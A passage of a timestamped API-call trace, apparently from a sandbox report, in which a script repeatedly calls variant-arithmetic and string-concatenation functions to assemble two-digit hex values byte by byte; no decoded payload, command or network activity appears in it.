[0112.645] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.645] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.645] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.645] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.645] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.645] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.645] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.645] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.645] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.646] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.646] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.646] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.646] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.646] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.646] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.647] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.647] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.647] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.647] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.647] VarBstrCat (in: bstrLeft="&Hb", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.647] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.647] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.647] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.647] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.648] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.648] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.648] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.648] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.648] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.648] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.648] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.648] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.649] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.649] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.649] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.649] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.649] VarBstrCat (in: bstrLeft="&H1", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.649] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.649] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.650] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.650] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.650] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.650] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.650] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.650] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.650] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.650] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.650] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.650] VarBstrCat (in: bstrLeft="&H8", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.651] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.651] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.651] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.651] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.651] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.651] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.652] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.652] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.652] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.652] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.652] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.652] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.652] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.652] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.653] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.653] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.653] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.653] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.653] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.653] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.653] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.653] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.653] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.654] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.654] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.654] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.654] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.654] VarBstrCat (in: bstrLeft="&H0", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.654] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.654] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.655] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.655] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.655] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.655] VarBstrCat (in: bstrLeft="&H2", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.655] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.655] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.655] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.655] VarBstrCat (in: bstrLeft="&Ha", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.655] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.656] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.656] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.656] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.656] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.656] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.656] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.657] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.657] VarBstrCat (in: bstrLeft="&H", bstrRight="a", 